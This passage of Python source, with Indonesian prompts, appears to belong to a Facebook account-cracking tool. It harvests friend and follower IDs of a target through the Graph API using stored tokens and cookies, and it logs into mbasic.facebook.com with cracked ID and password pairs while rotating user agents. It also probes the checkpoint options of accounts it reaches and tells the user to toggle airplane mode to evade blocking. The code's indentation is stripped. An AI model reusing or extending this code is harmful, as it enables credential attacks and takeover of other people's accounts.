jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
else:
x=f"{P2} hasil cp"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cuih = 0
lol = {}
for kaoo in c_o_k:
try:hikmat = open('CP/'+kaoo,'r').readlines()
except:continue
cuih+=1
if cuih<10:
__oo = '0'+str(cuih)
lol.update({str(cuih):str(kaoo)})
lol.update({__oo:str(kaoo)})
x=f"{P2}[{H2}{__oo}{P2}] {kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
#print(P+' •'+H+__oo+P+'• '+kaoo+' • '+str(len(hikmat))+' akun'+P)
else:
lol.update({str(cuih):str(kaoo)})
x=f"{P2}[{H2}{cuih}{P2}] {kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
#print(P+' •'+H+str(cuih)+P+'• '+kaoo+' • '+str(len(hikmat))+' akun'+P)
x=f"{P2}pilih hasil untuk ditampilkan"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
geeh = input(garis+" pilih : "+H)
try:geh = lol[geeh]
except KeyError:
print(garis+" pilihan tidak ada")
exit()
try:lin = open('CP/'+geh,'r').read()
except:
jalan(garis+" file tidak ditemukan")
time.sleep(2)
hasil_crack()
jalan(garis+" list akun cp kamu\n")
#x=f"{P2}cd CP*-->{geh}"
#vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
hus = os.system('cd CP && cat '+geh)
jalan("\n"+garis+" list akun cp kamu")
input(garis+" kembali")
menu()
elif inhasil in ["0","00"]:
menu()
else:
jalan(f"{garis} isi yang benar ")
hasil_crack()
def cracked_publickey():
print("")
x=f"{P2}ketik {H2}y{P2} untuk crack massal public\n{P2}ketik {H2}t{P2} untuk crack public"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cuy = input(f"{garis} pilih ({H}y{P}/{M}t{P}) ? : {H}")
if cuy in ["y","Y"]:
massal_cracked_public()
elif cuy in ["t","T"]:
cracked_public()
elif cuy in ["g","G"]:
cracked_email()
else:
jalan(f"{garis} isi yang benar ")
cracked_publickey()
def option_sesi():
try:c_o_k = os.listdir('CP')
except FileNotFoundError:
jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
if len(c_o_k)==0:
jalan(garis+" tidak ada hasil")
time.sleep(2)
hasil_crack()
else:
x=f"{P2} hasil cp"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
cuih = 0
lol = {}
for kaoo in c_o_k:
try:hikmat = open('CP/'+kaoo,'r').readlines()
except:continue
cuih+=1
if cuih<10:
__oo = '0'+str(cuih)
lol.update({str(cuih):str(kaoo)})
lol.update({__oo:str(kaoo)})
x=f"{P2}{kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
else:
lol.update({str(cuih):str(kaoo)})
x=f"{P2} {kaoo} • {str(len(hikmat))} akun{P2}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
x=f"{P2}contoh : CP/{cpz}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
files = input(f"{garis} pilih yang mau di cek : {H}")
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\n%s files %s%s%s tidak ada!"%(garis,H,files,P))
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print(f"\n{garis} account : "+K+(kontol.replace(" + ","")))
try:
cek_opsi(titid[0].replace(" + ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
input(f"{garis} enter untuk kembali ")
menu()
def HikmatXyz(user, pasw):
mb = ("https://mbasic.facebook.com")
ua_crack = ["Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.69 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Focus/1.0 Chrome/59.0.3029.83 Mobile Safari/537.36","Mozilla/5.0 (X11; Linux armv6l) EkiohFlow/5.13.4.34727M Flow/5.13.4 (like Gecko Firefox/62.0 rv:62.0)","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.40 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Silk/102.2.1 like Chrome/102.0.5005.125 Safari/537.36","Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36 PTST/220727.141334","Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8","Links (2.20.2; Linux 5.4.0-100-generic x86_64; GNU C 9.2.1; text)","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/68.0.2785.34 Safari/537.31 SmartTV/8.5","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/19.0 Chrome/102.0.5005.125 Safari/537.36","Mozilla/5.0 (Linux; x86_64 GNU/Linux) AppleWebKit/601.1 (KHTML, like Gecko) Version/8.0 Safari/601.1 WPE comcast/ipstb (comcast, 1.0.0.0)","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/68.0.2785.34 Safari/537.31 SmartTV/8.5","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.3945.79 Safari/537.36 SmartTV/10.0 Colt/2.022","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.3945.79 Safari/537.36 SmartTV/10.0 Colt/2.0","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3440.106 Safari/537.36 SmartTV/9.0 Crow/1.0"]
ua = random.choice(ua_crack)
ses = requests.Session()
ses.headers.update({
"Host": "mbasic.facebook.com",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"origin": host,
"content-type": "application/x-www-form-urlencoded",
"user-agent": ua,
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"x-requested-with": "mark.via.gp",
"sec-fetch-site": "same-origin",
"sec-fetch-mode": "navigate",
"sec-fetch-user": "?1",
"sec-fetch-dest": "document",
"referer": host+"/login/?next&ref=dbl&fl&refid=8",
"accept-encoding": "gzip, deflate",
"accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
})
data = {}
ged = sop(ses.get(host+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
try:
run = sop(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
except requests.exceptions.TooManyRedirects:
print("%s %sakun ke spam "%(garis,M))
if "c_user" in ses.cookies:
print("%s %sakun OK tidak checkpoint"%(garis,H))
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {
"fb_dtsg": dtsg,
"fb_dtsg": dtsg,
"jazoest": jzst,
"jazoest": jzst,
"checkpoint_data":"",
"submit[Continue]":"Lanjutkan",
"nh": nh
}
xnxx = sop(ses.post(host+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
if(str(len(ngew))=="0"):
print("%s %sakun tapyes!!.. segera check di fb lite/mbasic"%(garis,H))
else:
print("%s %sterdapat %s opsi "%(garis,K,str(len(ngew))))
for opt in range(len(ngew)):
print(" "*3, str(opt+1)+". "+ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print(" %s[%s!%s] %s%s"%(M,P,M,P,oh))
else:
print("%s %spassword akun telah diganti!!"%(garis,M))
def check_opsi_sesudah_crack():
print("")
x=f"{P2}silahkan mode pesawatkan 5 detik sebelum memulai check opsi:) atau ganti kartu sim yak:) "
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
input(f"{garis} enter untuk melanjutkan ")
files = (f"CP/{cpz}")
try:
buka_baju = open(files, "r").readlines()
except IOError:
exit("\n%s files %s%s%s tidak ada!"%(garis,H,files,P))
for memek in buka_baju:
kontol = memek.replace("\n","")
titid = kontol.split("|")
print(f"\n{garis} account : "+(kontol.replace(" + ","")))
try:
HikmatXF(titid[0].replace(" + ",""), titid[1])
except requests.exceptions.ConnectionError:
pass
#os.remove(f"CP/{cpz}")
input(f"{garis} enter untuk kembali ")
menu()
#exit("\n%s done ya cuy"%(garis))
def HikmatXF(user, pasw):
mb = ("https://mbasic.facebook.com")
ua_crack = ["Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.69 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Focus/1.0 Chrome/59.0.3029.83 Mobile Safari/537.36","Mozilla/5.0 (X11; Linux armv6l) EkiohFlow/5.13.4.34727M Flow/5.13.4 (like Gecko Firefox/62.0 rv:62.0)","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.40 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Silk/102.2.1 like Chrome/102.0.5005.125 Safari/537.36","Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Safari/537.36 PTST/220727.141334","Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8","Links (2.20.2; Linux 5.4.0-100-generic x86_64; GNU C 9.2.1; text)","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/68.0.2785.34 Safari/537.31 SmartTV/8.5","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/19.0 Chrome/102.0.5005.125 Safari/537.36","Mozilla/5.0 (Linux; x86_64 GNU/Linux) AppleWebKit/601.1 (KHTML, like Gecko) Version/8.0 Safari/601.1 WPE comcast/ipstb (comcast, 1.0.0.0)","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/68.0.2785.34 Safari/537.31 SmartTV/8.5","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.3945.79 Safari/537.36 SmartTV/10.0 Colt/2.022","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.3945.79 Safari/537.36 SmartTV/10.0 Colt/2.0","Mozilla/5.0 (Linux; NetCast; U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3440.106 Safari/537.36 SmartTV/9.0 Crow/1.0"]
ua = random.choice(ua_crack)
ses = requests.Session()
ses.headers.update({
"Host": "mbasic.facebook.com",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"origin": host,
"content-type": "application/x-www-form-urlencoded",
"user-agent": ua,
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"x-requested-with": "mark.via.gp",
"sec-fetch-site": "same-origin",
"sec-fetch-mode": "navigate",
"sec-fetch-user": "?1",
"sec-fetch-dest": "document",
"referer": host+"/login/?next&ref=dbl&fl&refid=8",
"accept-encoding": "gzip, deflate",
"accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
})
data = {}
ged = sop(ses.get(host+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
fm = ged.find("form",{"method":"post"})
list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
for i in fm.find_all("input"):
if i.get("name") in list:
data.update({i.get("name"):i.get("value")})
else:
continue
data.update({"email":user,"pass":pasw})
try:
run = sop(ses.post(host+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
except requests.exceptions.TooManyRedirects:
print("%s %sakun ke spam "%(garis,M))
if "c_user" in ses.cookies:
print("%s %sakun OK tidak checkpoint"%(garis,H))
elif "checkpoint" in ses.cookies:
form = run.find("form")
dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
jzst = form.find("input",{"name":"jazoest"})["value"]
nh = form.find("input",{"name":"nh"})["value"]
dataD = {
"fb_dtsg": dtsg,
"fb_dtsg": dtsg,
"jazoest": jzst,
"jazoest": jzst,
"checkpoint_data":"",
"submit[Continue]":"Lanjutkan",
"nh": nh
}
xnxx = sop(ses.post(host+form["action"], data=dataD).text, "html.parser")
ngew = [yy.text for yy in xnxx.find_all("option")]
if(str(len(ngew))=="0"):
print("%s %sakun tapyes!!.. segera check di fb lite/mbasic"%(garis,H))
else:
print("%s %sterdapat %s opsi "%(garis,K,str(len(ngew))))
for opt in range(len(ngew)):
print(" "*3, str(opt+1)+". "+ngew[opt])
elif "login_error" in str(run):
oh = run.find("div",{"id":"login_error"}).find("div").text
print(" %s[%s!%s] %s%s"%(M,P,M,P,oh))
else:
print("%s %spassword akun telah diganti!!"%(garis,M))
def cracked_email():
x = 0
print("")
n=f"{P2}[01] domain @gmail.com\n{P2}[02] domain @yahoo.com\n{P2}[03] domain @hotmail.com\n{P2}[04] domain @outlook.com"
vprint(panel(n,style=f"{warna_warni_rich_cerah}"))
sae = input(f"{garis} pilih : {H}")
if sae in["1"]:
email = "@gmail.com"
nama = input(f"{garis} input nama : ")
jumlah = int(input(f"{garis} input limit : "))
for z in range(jumlah):
x +=1
id.append(email+"<=>"+nama)
sys.stdout.write(f"\r{garis} sedang mengumpulkan id {len(id)} ");sys.stdout.flush()
elif sae in["2"]:
email = "@yahoo.com"
nama = input(f"{garis} input nama : ")
jumlah = int(input(f"{garis} input limit : "))
for z in range(jumlah):
x +=1
id.append(email+"<=>"+nama)
sys.stdout.write(f"\r{garis} sedang mengumpulkan id {len(id)} ");sys.stdout.flush()
elif sae in["3"]:
email = "@hotmail.com"
nama = input(f"{garis} input nama : ")
jumlah = int(input(f"{garis} input limit : "))
for z in range(jumlah):
x +=1
id.append(email+"<=>"+nama)
sys.stdout.write(f"\r{garis} sedang mengumpulkan id {len(id)} ");sys.stdout.flush()
elif sae in["4"]:
email = "@outlook.com"
nama = input(f"{garis} input nama : ")
jumlah = int(input(f"{garis} input limit : "))
for z in range(jumlah):
x +=1
id.append(email+"<=>"+nama)
sys.stdout.write(f"\r{garis} sedang mengumpulkan id {len(id)} ");sys.stdout.flush()
settingers()
def massal_cracked_public():
print("")
x=f"\t\t{P2}target id harus banyak temannya"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
try:
jum = int(input(garis+" mau berapa id target :"+H+" "))
except ValueError:
jalan(garis+" yang kamu ketik itu bukan nomor")
menu()
if jum<1 or jum>20:
jalan(garis+" kesalahan yang tidak terduga")
menu()
ses=requests.Session()
yz = 0
x=f"\t\t{P2}isi yang bener"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
for met in range(jum):
yz+=1
kl = input(garis+" masukan id ke "+H+str(yz)+P+" :"+H+" ")
#token = open('token.txt','r').read()
#cookie = open('cookie.txt','r').read()
#coki = {"cookie":cookie}
#$coa = requests.get('https://graph.facebook.com/%s?access_token=%s'%(kl,token),cookies=coki)
#el = json.loads(coa.text)
#try:lk = el["name"]
#except (KeyError,IOError):
#lk = M+"-"+P
#ooi = requests.get('https://graph.facebook.com/%s?access_token=%s'%(kl,token),cookies=coki)
#oer = json.loads(ooi.text)
#try:pok = oer["locale"]
#except (KeyError,IOError):
#pok = M+"-"+P
#id8 = []
#id9 = []
#token = open('token.txt','r').read()
#cookie = open('cookie.txt','r').read()
#coki = {"cookie":cookie}
#cyna = requests.get('https://graph.facebook.com/%s?fields=friends.limit(99999)&access_token=%s'%(kl,token),cookies=coki).json()
#for fuck in cyna['friends']['data']:
#try:id8.append(fuck['id']+'|'+fuck['name'])
#except:pass
#token = open('token.txt','r').read()
#cookie = open('cookie.txt','r').read()
#coki = {"cookie":cookie}
#cyna = requests.get('https://graph.facebook.com/%s?fields=subscribers.limit(5000)&access_token=%s'%(kl,token),cookies=coki).json()
#for fuck in cyna['subscribers']['data']:
#try:id9.append(fuck['id']+'|'+fuck['name'])
#except:pass
#x=f"{P2}nama target : {H2}{lk}\n{P2}friends total : {H2}{len(id8)}\n{P2}lokasi target akun : {H2}{pok}"
#vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
uid.append(kl)
#idez.append(kl)
for userr in uid:
try:
#token = open('token.txt','r').read()
#cookie = open('cookie.txt','r').read()
#coki = {"cookie":cookie}
#cyna = requests.get('https://graph.facebook.com/%s?fields=subscribers.limit(99999)&access_token=%s'%(idez,token),cookies=coki).json()
#for fuck in cyna['subscribers']['data']:
#try:id3.append(fuck['id']+'|'+fuck['name'])
#except:pass
#coa = requests.get('https://graph.facebook.com/%s?access_token=%s'%(userr,token),cookies=coki)
#el = json.loads(coa.text)
#try:lk = el["name"]
#except (KeyError,IOError):
#lk = M+"-"+P
token = open('token.txt','r').read()
cookie = open('cookie.txt','r').read()
coki = {"cookie":cookie}
cyna = requests.get('https://graph.facebook.com/%s?fields=friends.limit(99999)&access_token=%s'%(userr,token),cookies=coki).json()
for fuck in cyna['friends']['data']:
try:id.append(fuck['id']+'|'+fuck['name'])
except:continue
except (KeyError,IOError):
pass
except requests.exceptions.ConnectionError:
jalan(garis+" koneksi internet bermasalah ")
exit()
if len(id)==0:
x=f"{P2}total friends : {M2}{len(id)}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
else:
x=f"{P2}total friends : {H2}{len(id)}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
settingers()
def cracked_public():
print("")
x=f"\t\t{P2}target harus public & banyak friends nya"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
x=f"\t\t{P2}isi yang bener"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
put = input(garis+" target id public :"+H+" ")
try:
token = open('token.txt','r').read()
cookie = open('cookie.txt','r').read()
coki = {"cookie":cookie}
coa = requests.get('https://graph.facebook.com/%s?access_token=%s'%(put,token),cookies=coki)
el = json.loads(coa.text)
try:lk = el["name"]
except (KeyError,IOError):
lk = M+"-"+P
#nama = requests.get('https://graph.facebook.com/%s?access_token=%s'%(put,token),cookies=coki).json()
#print(f"{garis} Mengambil ID Teman"+H+": "+nama["name"])
#link = requests.get('https://graph.facebook.com/%s/fields=friends?fields=name,id,birthday&limit=1000&access_token=%s'%(put,token),cookies=coki)
#link_ = requests.get('https://graph.facebook.com/%s?fields=friends.limit(99999)&access_token=%s'%(put,token),cookies=coki).json()
#try:
#Hikmat = link["data"]
#ttl__ = []
#ttl__.append("\033[96;1m + TTL")
#except:
#pass
#if len(link["data"]) == 0:
#print(M+"\n [x] Tidak Bisa Mengakses Data: "+K+nama["name"])
#print(M+" [x] Coba cari Akun yg lainnya!")
#exit()
#global ttl__
token = open('token.txt','r').read()
cookie = open('cookie.txt','r').read()
coki = {"cookie":cookie}
cyna = requests.get('https://graph.facebook.com/%s?fields=friends.limit(99999)&access_token=%s'%(put,token),cookies=coki).json()
for fuck in cyna['friends']['data']:
try:id.append(fuck['id']+'|'+fuck['name'])
except:continue
cini = requests.get('https://graph.facebook.com/%s?fields=subscribers.limit(10000)&access_token=%s'%(put,token),cookies=coki).json()
for fak in cini['subscribers']['data']:
try:id3.append(fak['id']+'|'+fak['name'])
except:continue
#print(maling_pangsit+" nama target :%s %s"(H,lk))
x=f"{P2}nama target : {H2}{lk}\n{P2}total friends : {H2}{len(id)}\n{P2}total followers : {H2}{len(id3)}"
vprint(panel(x,style=f"{warna_warni_rich_cerah}"))
settingers()
except requests.exceptions.ConnectionError:
jalan(garis+" koneksi internet bermasalah ")
exit()
except (KeyError,IOError):
jalan(garis+" gagal dump id... mungkin privat friends/gada friends nya")
exit()
def settingers():
print("")